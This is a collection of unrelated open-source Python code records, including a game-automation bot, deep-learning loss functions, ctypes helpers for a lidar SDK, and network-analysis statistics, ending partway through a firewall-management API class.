str(self.count)+ \" / \"+ str(self.count_limit)+ \" 次\"\n\n self.quit_game()\n status = self.get_status()\n if status == \"UnKnown\":\n self.my_sleep(1)\n self.status_message = \"未知界面,识别失败\"\n print(\"未知界面,识别失败\")\n 
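Editor's note on the analyze.py record above — the shape descriptors (A3, D1–D4) all follow the same recipe: sample random vertex tuples, compute one scalar per tuple, and histogram it on a fixed range so descriptors are comparable across meshes. A compact self-contained NumPy sketch of D2 (pairwise distances); the duplicate handling is simplified to a modulo shift rather than the resampling used in check_duplicates:

import numpy as np

def d2_descriptor(vertices, n_samples=100000, n_bins=10, seed=None):
    rng = np.random.default_rng(seed)
    idx = rng.integers(0, len(vertices), size=(n_samples, 2))
    # Shift any pair that picked the same vertex twice (simplified).
    same = idx[:, 0] == idx[:, 1]
    idx[same, 1] = (idx[same, 1] + 1) % len(vertices)
    diffs = vertices[idx[:, 0]] - vertices[idx[:, 1]]
    dists = np.sqrt(np.sum(diffs ** 2, axis=1))
    # Fixed range, normalised counts -- same convention as make_bins above.
    hist, _ = np.histogram(dists, bins=n_bins, range=(0.0, 1.0), density=True)
    return hist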
continue\n\n            if status == \"start_small\":\n                self.mouse_click(self.find_position(self.start_small,False,False))\n                self.status_message = \"Starting battle\"\n                print(\"Starting battle\")\n                self.my_sleep(1)\n                continue\n            if status == \"recharge\":\n                if (self.if_recharge[0]) & (self.if_recharge[1]>0):\n                    self.mouse_click(self.find_position(self.recharge, False,False))\n                    self.status_message =\"Out of stamina, restoring stamina\"\n                    print(\"Out of stamina, restoring stamina\")\n                    self.my_sleep(1)\n                    self.if_recharge[1]-=1\n                    print(\"Remaining restore count: \",self.if_recharge[1])\n                    continue\n                print(\"Stamina exhausted, terminating program\")\n                break\n            if status == \"level_up\":\n                self.mouse_click(self.find_position(self.level_up, False,False))\n                print(\"Leveled up\")\n                self.status_message = \"Leveled up\"\n                self.my_sleep(1)\n                continue\n\n            if status == \"start_big\":\n                self.mouse_click(self.find_position(self.start_big, False,False))\n                print(\"Squad ready, starting battle\")\n                self.status_message = \"Squad ready, starting battle\"\n                self.my_sleep(1)\n                continue\n\n            if status == \"battle_normal\":\n                print(\"In battle\")\n                self.status_message = \"In battle\"\n                self.my_sleep(20)\n                continue\n\n            if status == \"battle_failed\":\n                print(\"Battle failed\")\n                self.status_message = \"Battle failed\"\n                self.my_sleep(2)\n                if self.if_battle_fail_continue:  # instance flag; the bare name here was a NameError\n                    self.mouse_click(self.find_position(self.battle_failed, False,False))\n                    print(\"Continuing battle\")\n                    self.status_message = \"Continuing battle\"\n                    continue\n                self.status_message = \"Exiting program\"\n                print(\"Exiting program\")\n                break\n\n            if status == \"end\":\n                self.mouse_click(self.find_position(self.end, False,False))\n                self.count += 1\n                self.status_message = \"Battle finished\"\n                print(\"Battle finished\")\n                self.my_sleep(2)\n                continue\n\n# if __name__ == \"__main__\":\n#     win = manager(\"明日方舟 - MuMu模拟器\")\n#\n#     self.my_sleep(1)\n#     # print(get_win_size(ratio,win))\n#     # get_screen_shoot(ratio,win).show()\n#     # win32gui.SetWindowPos(win, win32con.HWND_TOPMOST, 0,0,int(1600/ratio),int(988/ratio), win32con.SWP_SHOWWINDOW)\n#     # win32api.MessageBox(0, \"Do not resize the window; it will be locked on top\", \"Notice\",win32con.MB_ICONWARNING)\n#     win.start_game()\n\n\n\n\n\n\n","repo_name":"YulongWang2020/arknights_helper","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":9914,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"42715345983","text":"class Solution:\n    def simplifyPath(self, path: str) -> str:\n        files = path.split('/')\n        stack = []\n        for file in files:\n            if file == '' or file == '.':\n                continue\n            if file == '..':\n                if len(stack)>0:\n                    stack.pop()\n            else:\n                stack.append(file)\n        return '/'+'/'.join(stack)","repo_name":"OmarAbdulwahab/My-LeetCode-Solved-Problems","sub_path":"0071-simplify-path/0071-simplify-path.py","file_name":"0071-simplify-path.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17551907765","text":"import tensorflow as tf\nfrom db_config import cfg\n\n\ndef dice_coefficient_loss(y_true_cls, y_pred_cls,\n                          training_mask):\n    '''\n    dice loss\n    :param y_true_cls:\n    :param y_pred_cls:\n    :param training_mask:\n    :return:\n    '''\n    eps = 1e-6\n    intersection = tf.reduce_sum(y_true_cls * y_pred_cls * training_mask)\n    union = tf.reduce_sum(y_true_cls * training_mask) + tf.reduce_sum(y_pred_cls * training_mask) + eps\n    loss = 1. 
- (2 * intersection / union)\n return loss\n\n\ndef balance_cross_entropy_loss(gt, pred, mask,\n negative_ratio=3.0, eps=1e-6):\n positive = gt * mask\n negative = (1 - gt) * mask\n positive_count = tf.reduce_sum(positive)\n negative_count = tf.minimum(tf.reduce_sum(negative), positive_count * negative_ratio)\n negative_count = tf.cast(negative_count, tf.int32)\n gt = tf.reshape(gt, [-1, 1])\n pred = tf.reshape(pred, [-1, 1])\n cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(labels=gt, logits=pred)\n positive_loss = cross_entropy * positive\n negative_loss = cross_entropy * negative\n negative_loss, _ = tf.nn.top_k(tf.reshape(negative_loss, [-1]), negative_count)\n\n negative_count = tf.cast(negative_count, tf.float32)\n balance_loss = (tf.reduce_sum(positive_loss) + tf.reduce_sum(negative_loss)) / (positive_count + negative_count + eps)\n\n return balance_loss\n\ndef softmax_cross_entropy_loss(y_true_cls, y_pred_cls, training_mask):\n '''\n softmax_cross_entropy(SCE) loss\n :param y_true_cls:[bs,w,h,N]\n :param y_pred_cls:[bs,w,h,N]\n :param training_mask:\n :return:\n '''\n re_mask = 1 - training_mask\n zero_mask = tf.zeros(tf.shape(re_mask))\n add_mask = tf.concat((re_mask, zero_mask, zero_mask), axis=3)\n\n y_true_cls = y_true_cls * training_mask + add_mask\n y_pred_cls = y_pred_cls * training_mask + add_mask\n\n y_true_cls = tf.reshape(y_true_cls, [-1, tf.shape(y_true_cls)[-1]])\n y_pred_cls = tf.reshape(y_pred_cls, [-1, tf.shape(y_true_cls)[-1]])\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_true_cls, logits=y_pred_cls)\n cls_loss = tf.reduce_mean(cross_entropy)\n\n return cls_loss\n\ndef l1_loss(pred, gt, mask):\n\n loss = tf.reduce_mean(tf.abs(pred - gt) * mask) + 1e-6\n\n return loss\n\n\ndef smooth_l1_loss(pred, gt, mask, sigma=1.0):\n '''\n\n :param pred:\n :param gt: shape is same as pred\n :param sigma:\n :return:\n '''\n sigma2 = sigma**2\n\n diff = pred * mask - gt\n\n with tf.name_scope('smooth_l1_loss'):\n deltas_abs = tf.abs(diff)\n smoothL1_sign = tf.cast(tf.less(deltas_abs, 1.0 / sigma2), tf.float32)\n return tf.reduce_mean(tf.square(diff) * 0.5 * sigma2 * smoothL1_sign + \\\n (deltas_abs - 0.5 / sigma2) * tf.abs(smoothL1_sign - 1))\n\ndef compute_cls_acc(pred, gt, mask):\n\n zero = tf.zeros_like(pred, tf.float32)\n one = tf.ones_like(pred, tf.float32)\n\n pred = tf.where(pred < 0.3, x=zero, y=one)\n acc = tf.reduce_mean(tf.cast(tf.equal(pred * mask, gt * mask), tf.float32))\n\n return acc\n\n\ndef compute_loss(binarize_map, threshold_map, thresh_binary,\n gt_score_maps, gt_threshold_map, gt_score_mask, gt_thresh_mask):\n\n binarize_loss = dice_coefficient_loss(gt_score_maps, binarize_map, gt_score_mask)\n threshold_loss = l1_loss(threshold_map, gt_threshold_map, gt_thresh_mask)\n thresh_binary_loss = dice_coefficient_loss(gt_score_maps, thresh_binary, gt_score_mask)\n\n model_loss = cfg.TRAIN.LOSS_ALPHA * binarize_loss + cfg.TRAIN.LOSS_BETA * threshold_loss + thresh_binary_loss\n\n tf.summary.scalar('losses/binarize_loss', binarize_loss)\n tf.summary.scalar('losses/threshold_loss', threshold_loss)\n tf.summary.scalar('losses/thresh_binary_loss', thresh_binary_loss)\n return model_loss\n\ndef compute_acc(binarize_map, threshold_map, thresh_binary,\n gt_score_maps, gt_threshold_map, gt_score_mask, gt_thresh_mask):\n binarize_acc = compute_cls_acc(binarize_map, gt_score_maps, gt_score_mask)\n thresh_binary_acc = compute_cls_acc(thresh_binary, gt_score_maps, gt_score_mask)\n\n tf.summary.scalar('acc/binarize_acc', binarize_acc)\n 
tf.summary.scalar('acc/thresh_binary_acc', thresh_binary_acc)\n\n    return binarize_acc, thresh_binary_acc\n\n\n\n\n","repo_name":"iamrishab/DB-tf","sub_path":"lib/networks/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"77"} +{"seq_id":"43092728665","text":"from django.urls import path\r\nfrom . import api\r\n\r\napp_name='umrah'\r\n\r\nurlpatterns = [\r\n    path(\"hegg/trips/\",api.HeggListView.as_view(),name='Filtered hegg'),\r\n    path(\"hegg/trips/\",api.heggdetails,name='tripin details'),\r\n    path(\"hegg/\",api.MODELItemViewSet.as_view({'get': 'list'}),name='range hegg'),\r\n    path(\"umrah/\",api.MODELItemViewSet.as_view({'get': 'list'}),name='range umrah'),\r\n    path(\"umrah/trips/\",api.TripListView.as_view(),name='Filtered umrah'),\r\n    path(\"umrah/trips/\",api.umrahdetails,name='umrah details'),\r\n]","repo_name":"sa2r851/travel-app","sub_path":"myproject/umrah/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6869333917","text":"import requests\n\n\ndef send(uri, payload):\n    request = requests.get(uri, params=payload)\n    result = request.json()\n    error = result.get('error')\n    if error:\n        error_code = result.get('error').get('error_code')\n        error_msg = result.get('error').get('error_msg')\n        url = request.url\n        raise ValueError(f\"error_code={error_code} - error_msg={error_msg} - url={url}\")\n    return result\n","repo_name":"mnmyasis/ditexos","sub_path":"ditexos/vk/services/vk_ads/_send.py","file_name":"_send.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"47469587426","text":"# [2, 3, 6, 7] and target 7 => [[7], [2,2,3]]\n\ndef combinationSum(a: list, target: int):\n    res = []\n\n    def dfs(i, cur, total):\n        if total == target:\n            res.append(cur.copy())\n            return\n\n        if i >= len(a) or total > target:\n            return\n\n        cur.append(a[i])\n        dfs(i, cur, total + a[i])\n        cur.pop()\n        dfs(i+1, cur, total)\n\n    dfs(0, [], 0)\n    return res\n\n\na = [2, 3, 6, 7]\ntarget = 7\nprint(combinationSum(a, target))\n","repo_name":"RuntimeTerror-404/leetcode-easy_medium","sub_path":"39.py","file_name":"39.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36894514055","text":"# -*- coding:utf-8 -*-\nfrom jinstall.centos7.utils.Tool import *\n\n\nclass SyGo:\n    # Configure the Go environment\n    @staticmethod\n    def install_go(params: dict):\n        \"\"\"Install the Go language\"\"\"\n        Tool.check_local_files([\n            'resources/lang/go/go1.14.4.linux-amd64.tar.gz',\n        ])\n        Tool.upload_file_fabric({\n            '/resources/lang/go/go1.14.4.linux-amd64.tar.gz': 'remote/go1.14.4.linux-amd64.tar.gz',\n        })\n        with cd(install_configs['path.package.remote']):\n            run('mkdir /usr/local/gopath && mkdir /usr/local/gocache')\n            run('tar -zxf go1.14.4.linux-amd64.tar.gz')\n            run('mv go/ /usr/local')\n            run('rm -rf go1.14.4.linux-amd64.tar.gz')\n","repo_name":"a07061625/swooleyaf_install","sub_path":"jinstall/centos7/tools/SyGo.py","file_name":"SyGo.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"21063151197","text":"# This work is based on original code developed and copyrighted by TNO 2020.\r\n# Subsequent contributions are licensed 
to you by the developers of such code and are\r\n# made available to the Project under one or several contributor license agreements.\r\n#\r\n# This work is licensed to you under the Apache License, Version 2.0.\r\n# You may obtain a copy of the license at\r\n#\r\n#      http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Contributors:\r\n#      TNO         - Initial implementation\r\n# Manager:\r\n#      TNO\r\n\r\nfrom dataclasses import dataclass, field, asdict\r\nfrom extensions.vue_backend.messages.DLA_table_data_message import DLA_table_data_response\r\n\r\n@dataclass\r\nclass childclass():\r\n    a: int\r\n\r\n@dataclass\r\nclass test():\r\n    a: int = field(default=3)\r\n    b: str = field(default='b')\r\n    c: str = 'x'\r\n    d: dict = field(default_factory=dict)\r\n    e: list = field(default_factory=list)\r\n    f: childclass = field(default=None)\r\n\r\nif __name__ == '__main__':\r\n    r = DLA_table_data_response()\r\n    print(r)\r\n\r\n    t = test(0, 'a')\r\n    print(t)\r\n    # test default values\r\n    t = test()\r\n    print(t)\r\n\r\n    # use dataclasses as subclasses, they serialize really nicely\r\n    t = test(f=childclass(2))\r\n\r\n    # instantiate a dataclass based on a dict\r\n    dict_test = dict()\r\n    dict_test['a'] = 2\r\n    dict_test['b'] = 'x'\r\n    dict_test['c'] = 'y'\r\n    dict_test['d'] = {'a': 3}\r\n    dict_test['e'] = [0, 1]\r\n    dict_test['f'] = None\r\n    print(dict_test)\r\n    y = test(**dict_test)\r\n    print(y)\r\n\r\n    # convert it back to a dict\r\n    dict_y = asdict(y)\r\n    print(dict_test == dict_y)\r\n\r\n    # work with list and dicts inside a dataclass\r\n    y.e.append('a')\r\n    y.d['test'] = 'works'\r\n    y.f = childclass(3)\r\n\r\n    dict_y = asdict(y)\r\n    print(y)\r\n    print(dict_y)\r\n    print(list(dict_y.values()))\r\n\r\n\r\n\r\n","repo_name":"ESDLMapEditorESSIM/esdl-mapeditor","sub_path":"tests/dataclass_example.py","file_name":"dataclass_example.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14181867651","text":"import os\n\nlistOfShame = [] \n\nwhile True: \n    menu = input(\"Add or Remove or Exit? \\n press a to add, r to remove, q or e to exit: \") \n\n    if not menu.strip():  # guard against empty input before indexing the first character\n        continue\n\n    if(menu.strip().lower()[0]==\"a\"): \n        \n        name = input(\"What is your name? \")\n        age = input(\"What is your age? \")\n        pref = input(\"What is your computer platform? 
\")\n \n row = [name, age, pref] \n \n listOfShame.append(row) \n \n elif(menu.strip().lower()[0]=='r' ):\n name = input(\"What is the name of the record to delete?\") \n \n for r in listOfShame:\n if name in r: \n listOfShame.remove(r) # remove the whole row if name is in it\n elif(menu.strip().lower()[0]=='q' or menu.strip().lower()[0]=='e' ): \n print('-------- ended ------')\n break\n else:\n os.system('cls')\n print('---Wrong Input ----')\n exit()\n\n\n\nprint(listOfShame)\n","repo_name":"johnpauljpc/100-Days-of-Code","sub_path":"day44.py","file_name":"day44.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36843977020","text":"import ctypes\nimport os\nimport os.path\nimport platform\nimport pprint\nimport sys\nfrom ctypes import *\n\nimport numpy\n\nimport cepton_util.common\n\n_all_builder = cepton_util.common.AllBuilder(__name__)\n\n# ------------------------------------------------------------------------------\n# Load library\n# ------------------------------------------------------------------------------\n\n\ndef load_c_library(parent_dir, name):\n if sys.platform.startswith(\"linux\"):\n if platform.machine().startswith(\"armv\"):\n os_name = \"linux-arm\"\n else:\n os_name = \"linux-{}\".format(platform.machine())\n lib_name = \"lib{}.so\".format(name)\n elif sys.platform.startswith(\"darwin\"):\n os_name = \"osx\"\n lib_name = \"lib{}.dylib\".format(name)\n elif sys.platform.startswith(\"win\"):\n os_name = \"win64\"\n lib_name = \"{}.dll\".format(name)\n else:\n raise NotImplementedError(\"Platform not supported!\")\n lib_dir = \"lib/{}/\".format(os_name)\n\n # Try local and global search paths\n path = os.path.join(parent_dir, lib_dir, lib_name)\n if not os.path.exists(path):\n path = lib_name\n return CDLL(path)\n\n\ndef check_c_size(lib, c_type, var_name):\n expected_size = c_size_t.in_dll(lib, var_name).value\n if sizeof(c_type) != expected_size:\n raise RuntimeError(\"{} has size {} (expected {})!\".format(\n c_type, sizeof(c_type), expected_size))\n\n\ndef from_bytes(c_type, buffer):\n assert (sizeof(c_type) <= len(buffer))\n c_value = c_type()\n memmove(addressof(c_value), buffer, sizeof(c_value))\n return c_value\n\n\ndef to_bytes(c_value):\n buffer = create_string_buffer(sizeof(c_value))\n memmove(buffer, addressof(c_value), sizeof(c_value))\n return buffer\n\n# ------------------------------------------------------------------------------\n# Structures\n# ------------------------------------------------------------------------------\n\n\ndef c_struct_to_dict(c_obj):\n data = {}\n for field in c_obj._fields_:\n name = field[0]\n data[name] = getattr(c_obj, name)\n return data\n\n\ndef print_c_struct(c_obj):\n data = c_struct_to_dict(c_obj)\n pprint.pprint(data)\n\n\ndef update_c_struct_from_dict(c_obj, d):\n valid = set([])\n for field in c_obj._fields_:\n name = field[0]\n if name in d:\n value = getattr(c_obj, name)\n assert (not isinstance(value, Array))\n setattr(c_obj, name, d[name])\n valid.add(name)\n invalid = set(d.keys()) - valid\n if invalid:\n raise AttributeError(\"invalid keys: {}\".format(invalid))\n\n\n# ------------------------------------------------------------------------------\n# Arrays\n# ------------------------------------------------------------------------------\n_C_NDARRAY_REQUIREMENTS = [\"C_CONTIGUOUS\", \"ALIGNED\", \"WRITEABLE\", \"OWNDATA\"]\n\n\ndef get_c_ndpointer_type(dtype, ndim=1):\n return numpy.ctypeslib.ndpointer(\n 
dtype=dtype, ndim=ndim, flags=_C_NDARRAY_REQUIREMENTS)\n\n\ndef get_c_ndarray(a, **kwargs):\n    return numpy.require(a, requirements=_C_NDARRAY_REQUIREMENTS, **kwargs)\n\n\ndef create_c_ndarray(size, dtype):\n    a = numpy.zeros(size, dtype)\n    return get_c_ndarray(a)\n\n\ndef convert_bytes_to_ndarray(a_bytes, c_type):\n    \"\"\"Convert numpy bytes array to numpy array\"\"\"\n    dtype = numpy.dtype(c_type)\n    assert (sizeof(c_type) == dtype.itemsize)\n    a = numpy.frombuffer(a_bytes, dtype)\n    assert (len(a) == len(a_bytes) / sizeof(c_type))\n    return a\n\n\ndef convert_ndarray_to_bytes(a):\n    \"\"\"Convert numpy array to numpy bytes array\"\"\"\n    return a.view(numpy.uint8)\n\n\ndef convert_c_array_to_ndarray(n, c_a):\n    \"\"\"Convert ctypes pointer to numpy array\"\"\"\n    assert(isinstance(c_a, ctypes._Pointer))\n    c_type = c_a._type_\n    n_bytes = n * sizeof(c_type)\n    a_bytes = \\\n        numpy.ctypeslib.as_array(cast(c_a, POINTER(c_byte)), shape=(n_bytes,))\n    return convert_bytes_to_ndarray(a_bytes, c_type)\n\n\ndef convert_ndarray_to_c_array(a):\n    \"\"\"Convert numpy array to ctypes pointer\"\"\"\n    c_type = a.dtype\n    a_bytes = convert_ndarray_to_bytes(a)\n    assert (len(a_bytes) == len(a) * sizeof(c_type))\n    c_a_bytes = numpy.ctypeslib.as_ctypes(a_bytes)\n    c_a = cast(c_a_bytes, POINTER(c_type))\n    return c_a\n\n\ndef unpack_bits(a):\n    \"\"\"Convert array of integers to array of bool\"\"\"\n    if a.size == 0:\n        return numpy.zeros(list(a.shape) + [a.dtype.itemsize * 8], dtype=bool)\n    bits = numpy.unpackbits(a.flatten().view(numpy.uint8)).astype(bool)\n    bits = bits.reshape([-1, 8])[:, ::-1]\n    bits = bits.reshape(list(a.shape) + [-1])\n    return bits\n\n\ndef pack_bits(bits, c_type):\n    \"\"\"Convert array of bool back to array of integers (inverse of `unpack_bits`)\"\"\"\n    dtype = numpy.dtype(c_type)\n    if bits.size == 0:\n        return numpy.zeros(bits.shape[:-1], dtype=dtype)\n    shape = bits.shape[:-1]\n    # Undo the per-byte bit reversal applied in `unpack_bits` before packing.\n    bits = bits.reshape([-1, 8])[:, ::-1]\n    a = numpy.packbits(bits.flatten()).view(dtype)\n    a = a.reshape(shape)\n    return a\n\n\n__all__ = _all_builder.get()\n","repo_name":"ceptontech/cepton_sdk_redist","sub_path":"python/cepton_sdk/common/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"45453854756","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport welib.weio as weio # https://github.com/ebranlard/weio\r\n\r\n# Local \r\nfrom wtDigiTwin.ws_estimator.tabulated import TabulatedWSEstimator\r\n\r\nIStudy=[1,3]\r\n\r\n\r\nif 1 in IStudy:\r\n    try:\r\n        os.mkdir('../../_data/wsest/')\r\n    except:\r\n        pass\r\n    relaxation=0.3\r\n    base='../../_data/NREL5MW'\r\n    Main='../../_data/NREL5MW_SimpleSimulations/TurbWindStep_AllDOF.fst'; \r\n    # --- Turbine data and estimator\r\n    wse = TabulatedWSEstimator(fst_file=Main)\r\n    wse.load_files(base=base,suffix='')\r\n    print(wse)\r\n    # --- Loading data\r\n    df = weio.read(Main.replace('.fst','.outb')).toDataFrame()\r\n    time = df['Time_[s]']\r\n    TTvx = df['NcIMUTVxs_[m/s]']\r\n    ws_ref = df['RtVAvgxh_[m/s]'] # Rotor avg\r\n    pitch = df['BldPitch1_[deg]']\r\n    Qaero_ref = df['RtAeroMxh_[N-m]']\r\n    omega = df['RotSpeed_[rpm]']*2*np.pi/60 # rad/s\r\n    lambda_ref=omega*wse.R/ws_ref\r\n    Qaero = wse.Torque(ws_ref,pitch,omega)\r\n    Thrust = wse.Thrust(ws_ref,pitch,omega)\r\n    # ----\r\n    print('Estimating...')\r\n    ws_est=np.zeros(omega.shape)\r\n    print(ws_est.shape)\r\n    WS0=ws_ref[0]*0.9 # estimate previous time step\r\n    for i,(Qa,p,o,ws0) in enumerate(zip(Qaero_ref,pitch,omega,ws_ref)):\r\n        ws_hat=wse.estimate(Qa, p, o, 
WS0,relaxation=relaxation)\r\n        ws_est[i]=ws_hat\r\n        WS0=ws_hat\r\n        if np.mod(i,1000)==0:\r\n            print(i,len(ws_ref),'{:4.1f} {:4.1f}'.format(ws_ref[i],ws_est[i]))\r\n\r\n    Qaero2 = wse.Torque(ws_est,pitch,omega)\r\n    # --- Export\r\n    M=np.column_stack((time,ws_ref,ws_est,Qaero_ref,Qaero,Qaero2,omega,pitch))\r\n    header='time,ws_ref,ws,Qaero_ref,Qaero,Qaero2,omega,pitch'\r\n    np.savetxt('../../_data/wsest/_{:.1f}.csv'.format(relaxation),M,delimiter=',',header=header)\r\n\r\nif 3 in IStudy:\r\n    base='../../_data/NREL5MW'\r\n    #Main='../../_data/NREL5MW_SimpleSimulations/TurbWindStep_AllDOF.fst'; \r\n    Main='../../_data/NREL5MW/Main_Onshore.fst'; \r\n    wse = TabulatedWSEstimator(fst_file=Main)\r\n    wse.load_files(base=base,suffix='')\r\n    print(wse)\r\n# \r\nplt.show()\r\n\r\n","repo_name":"ebranlard/welib","sub_path":"welib/kalman/examples/onshore_YAMS/100_WSEstimation.py","file_name":"100_WSEstimation.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"77"} +{"seq_id":"19044136796","text":"import pickle\nimport scipy.stats\nimport os\nimport collections\nimport numpy as np\n\nimport network_io\nimport complete_invariant_dicts\nimport plotting\nimport pipeline\nimport network_construction\n\ndef find_numbers_of_isomorphism_classes():\n    example_nets_folder = '???'\n    sizes = [(2,2),(3,2),(4,2),(2,3),(3,3)]\n    counts = dict()\n    for size in sizes:\n        with open(example_nets_folder+str(size[0])+'_'+str(size[1])+'.pickle','rb') as f:  # pickle files must be opened in binary mode\n            d = pickle.load(f)\n        counts[size] = len(d)\n        del d\n    return counts\n    \ndef t_tests_for_two_dict_lists(list1,list2,equal_var=False,map_ni_to_nli=False,nnodes=-1,nlayers=-1):\n    invariants = set()\n    layersets = set()\n    \n    if map_ni_to_nli:\n        example_nets_filename = '???'\n        invdicts = complete_invariant_dicts.load_example_nets_file(example_nets_filename)\n        list1,invariants1,mapped_invdicts1 = plotting.ni_to_nli(list1,invdicts)\n        list2,invariants2,mapped_invdicts2 = plotting.ni_to_nli(list2,invdicts)\n        invariants = invariants1.union(invariants2)\n        \n    \n    for compinv_dict in list1:\n        for compinv in compinv_dict:\n            if not map_ni_to_nli:\n                invariants.add(compinv)\n            layersets.update([layerset for layerset in compinv_dict[compinv]])\n    for compinv_dict in list2:\n        for compinv in compinv_dict:\n            if not map_ni_to_nli:\n                invariants.add(compinv)\n            layersets.update([layerset for layerset in compinv_dict[compinv]])\n    \n    layersets = list(layersets)\n    layersets.sort()\n    \n    results = collections.defaultdict(dict)\n    \n    for compinv in invariants:\n        for layerset in layersets:\n            temp_layerset_vals_1 = []\n            for compinv_dict in list1:\n                if compinv in compinv_dict:\n                    temp_layerset_vals_1.append(compinv_dict[compinv].get(layerset,0))\n                else:\n                    temp_layerset_vals_1.append(0)\n            temp_layerset_vals_2 = []\n            for compinv_dict in list2:\n                if compinv in compinv_dict:\n                    temp_layerset_vals_2.append(compinv_dict[compinv].get(layerset,0))\n                else:\n                    temp_layerset_vals_2.append(0)\n            \n            results[compinv][layerset] = scipy.stats.ttest_ind(temp_layerset_vals_1,temp_layerset_vals_2,equal_var=equal_var)\n    \n    return results\n\n\n\n#################### Basic properties ######################################################################################################\n\ndef find_number_and_weights_of_interlayer_edges(network):\n    number_of_interlayer_edges = 0\n    weights = []\n    for edge in list(network.edges):\n        if edge[2] != edge[3]:\n            number_of_interlayer_edges = number_of_interlayer_edges + 1\n            weights.append(edge[4])\n    return 
number_of_interlayer_edges,weights\n \ndef find_all_interlayer_information(network):\n number_of_interlayer_edges = 0\n weights = []\n intersections = []\n unions = []\n sizes = []\n for edge in list(network.edges):\n if edge[2] != edge[3]:\n number_of_interlayer_edges = number_of_interlayer_edges + 1\n weights.append(edge[4])\n if edge[2] < edge[3]:\n A = set(eval(edge[0]))\n B = set(eval(edge[1]))\n else:\n A = set(eval(edge[1]))\n B = set(eval(edge[0]))\n intersections.append(A.intersection(B))\n unions.append(A.union(B))\n sizes.append((len(A),len(B)))\n return number_of_interlayer_edges,weights,intersections,unions,sizes\n\ndef find_in_and_out_degrees(M,layer):\n # Assumes layers are numbered with consecutive integers and considers only edges from layer+-1 to layer\n in_degrees = []\n out_degrees = []\n for node in M.iter_nodes(layer=layer):\n in_degree = 0\n out_degree = 0\n for neighbor in list(M[node,layer]):\n if neighbor[1] == layer - 1:\n in_degree = in_degree + 1\n elif neighbor[1] == layer + 1:\n out_degree = out_degree + 1\n in_degrees.append(in_degree)\n out_degrees.append(out_degree)\n return in_degrees,out_degrees\n\ndef find_cluster_sizes(M,layer):\n cluster_sizes = []\n for node in M.iter_nodes(layer=layer):\n voxellist = eval(node)\n cluster_sizes.append(len(voxellist))\n return cluster_sizes\n\n\n\n#################### Aggregation and null model p values ###################################################################################\n\ndef t_tests_for_aggregated_dicts(compinvdict1,compinvdict2):\n assert set(compinvdict1.keys()) == set(compinvdict2.keys())\n results = dict()\n for compinv in compinvdict1:\n results[compinv] = scipy.stats.ttest_ind(compinvdict1[compinv],compinvdict2[compinv],equal_var=False)\n return results\n\ndef aggregated_ni_to_nli(compinvdict,examples_dict):\n nli_dict = collections.defaultdict(list)\n for compinv in compinvdict:\n nl_complete_invariant = network_io.pn.get_complete_invariant(examples_dict[compinv],allowed_aspects='all')\n nli_dict[nl_complete_invariant].extend(compinvdict[compinv])\n return nli_dict\n","repo_name":"ercco/multilayer-brains","sub_path":"code/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"42516783588","text":"\"\"\"Device Records Classes.\"\"\"\n\nfrom fmcapi.api_objects.apiclasstemplate import APIClassTemplate\nfrom fmcapi.api_objects.policy_services.accesspolicies import AccessPolicies\nfrom fmcapi.api_objects.status_services import TaskStatuses\nimport time\nimport logging\n\n\nclass DeviceRecords(APIClassTemplate):\n \"\"\"The DeviceRecords Object in the FMC.\"\"\"\n\n VALID_JSON_DATA = [\n \"id\",\n \"name\",\n \"type\",\n \"hostName\",\n \"natID\",\n \"regKey\",\n \"license_caps\",\n \"performanceTier\",\n \"accessPolicy\",\n ]\n VALID_FOR_KWARGS = VALID_JSON_DATA + [\n \"acp_name\",\n \"acp_id\",\n \"model\",\n \"modelId\",\n \"modelNumber\",\n \"modelType\",\n \"healthStatus\",\n \"healthPolicy\",\n \"type\",\n \"version\",\n \"sw_version\",\n \"deviceGroup\",\n \"prohibitPacketTransfer\",\n \"keepLocalEvents\",\n \"ftdMode\",\n \"keepLocalEvents\",\n ]\n URL_SUFFIX = \"/devices/devicerecords\"\n REQUIRED_FOR_POST = [\"accessPolicy\", \"hostName\", \"regKey\", \"type\"]\n REQUIRED_FOR_PUT = [\"id\"]\n LICENSES = [\n \"BASE\",\n \"THREAT\",\n \"URLFilter\",\n \"MALWARE\",\n \"APEX\",\n \"PLUS\",\n \"VPNOnly\",\n \"INSTANCE\",\n ]\n TIERS = [\"FTDv5\", 
